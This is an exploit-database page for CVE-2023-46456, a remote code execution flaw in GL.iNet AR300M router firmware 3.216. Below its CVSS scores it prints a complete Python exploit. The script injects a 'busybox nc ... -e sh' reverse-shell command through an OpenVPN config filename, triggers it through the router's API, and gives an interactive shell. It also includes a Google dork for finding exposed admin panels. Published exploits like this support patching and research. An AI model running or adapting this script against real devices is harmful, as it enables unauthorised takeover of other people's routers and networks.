GL.iNet AR300M v3.216 Remote Code Execution Exploit

2024-03-0400:00:00

cyberaz0r

0day.today

gl.inet

ar300m

remote code execution

openvpn

vulnerability

exploit

administrator panel

google dork

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.4 High

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

39.2%

JSON

#!/usr/bin/env python3

# Exploit Title: GL.iNet <= 3.216 Remote Code Execution via OpenVPN Client
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: XX/11/2023
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://www.gli-net.com
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/v1/openwrt-ar300m-3.216-0321-1679391449.tar
# Version: 3.216
# Tested on: GL.iNet AR300M
# CVE: CVE-2023-46456

import socket
import requests
import readline
from time import sleep
from random import randint
from sys import stdout, argv
from threading import Thread

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def generate_random_string():
	return ''.join([chr(randint(97, 122)) for x in range(6)])

def add_config_file(url, auth_token, payload):
	data = {'file': ('{}'.format(payload), 'client\ndev tun\nproto udp\nremote 127.0.0.1 1194\nscript-security 2')}
	try:
		r = requests.post(url, files=data, headers={'Authorization':auth_token}, verify=False)
		r.raise_for_status()
	except requests.exceptions.RequestException:
		print('[X] Error while adding configuration file')
		return False
	return True

def verify_config_file(url, auth_token, payload):
	try:
		r = requests.get(url, headers={'Authorization':auth_token}, verify=False)
		r.raise_for_status()
		if not r.json()['passed'] and payload not in r.json()['passed']:
			return False
	except requests.exceptions.RequestException:
		print('[X] Error while verifying the upload of configuration file')
		return False
	return True

def add_client(url, auth_token):
	postdata = {'description':'RCE_client_{}'.format(generate_random_string())}
	try:
		r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)
		r.raise_for_status()
	except requests.exceptions.RequestException:
		print('[X] Error while adding OpenVPN client')
		return False
	return True

def get_client_id(url, auth_token, payload):
	try:
		r = requests.get(url, headers={'Authorization':auth_token}, verify=False)
		r.raise_for_status()
		for conn in r.json()['clients']:
			if conn['defaultserver'] == payload:
				return conn['id']
		print('[X] Error: could not find client ID')
		return False
	except requests.exceptions.RequestException:
		print('[X] Error while retrieving added OpenVPN client ID')
	return False

def connect_vpn(url, auth_token, client_id):
	sleep(0.25)
	postdata = {'ovpnclientid':client_id, 'enableovpn':'true', 'force_client':'false'}
	r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)

def cleanup(url, auth_token, client_id):
	try:
		r = requests.post(url, data={'clientid':client_id}, headers={'Authorization':auth_token}, verify=False)
		r.raise_for_status()
	except requests.exceptions.RequestException:
		print('[X] Error while cleaning up OpenVPN client')
		return False
	return True

def get_command_response(s):
	res = ''
	while True:
		try:
			resp = s.recv(1).decode('utf-8')
			res += resp
		except UnicodeDecodeError:
			pass
		except socket.timeout:
			break
	return res

def revshell_listen(revshell_ip, revshell_port):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.settimeout(5)

	try:
		s.bind((revshell_ip, int(revshell_port)))
		s.listen(1)
	except Exception as e:
		print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))
		exit(1)

	try:
		clsock, claddr = s.accept()
		clsock.settimeout(2)
		if clsock:
			print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))
			res = ''
			while True:
				command = input('$ ')
				clsock.sendall('{}\n'.format(command).encode('utf-8'))
				stdout.write(get_command_response(clsock))

	except socket.timeout:
		print('[-] No connection received in 5 seconds, probably server is not vulnerable...')
		s.close()

	except KeyboardInterrupt:
		print('\n[*] Closing connection')
		try:
			clsock.close()
		except socket.error:
			pass
		except NameError:
			pass
		s.close()

def main(base_url, auth_token, revshell_ip, revshell_port):
	print('[+] Started GL.iNet <= 3.216 OpenVPN client config filename RCE exploit')

	payload = '$(busybox nc {} {} -e sh).ovpn'.format(revshell_ip, revshell_port)
	print('[+] Filename payload: "{}"'.format(payload))

	print('[*] Uploading crafted OpenVPN config file')
	if not add_config_file(base_url+'/api/ovpn/client/upload', auth_token, payload):
		exit(1)

	if not verify_config_file(base_url+'/cgi-bin/api/ovpn/client/uploadcheck', auth_token, payload):
		exit(1)
	print('[+] File uploaded successfully')

	print('[*] Adding OpenVPN client')
	if not add_client(base_url+'/cgi-bin/api/ovpn/client/addnew', auth_token):
		exit(1)

	client_id = get_client_id(base_url+'/cgi-bin/api/ovpn/client/list', auth_token, payload)
	if not client_id:
		exit(1)
	print('[+] Client ID: ' + client_id)

	print('[*] Triggering connection to created OpenVPN client')
	Thread(target=connect_vpn, args=(base_url+'/cgi-bin/api/ovpn/client/set', auth_token, client_id)).start()

	print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))
	revshell_listen(revshell_ip, revshell_port)

	print('[*] Clean-up by removing OpenVPN connection')
	if not cleanup(base_url+'/cgi-bin/api/ovpn/client/remove', auth_token, client_id):
		exit(1)

	print('[+] Done')

if __name__ == '__main__':
	if len(argv) < 5:
		print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))
		exit(1)

	main(argv[1], argv[2], argv[3], argv[4])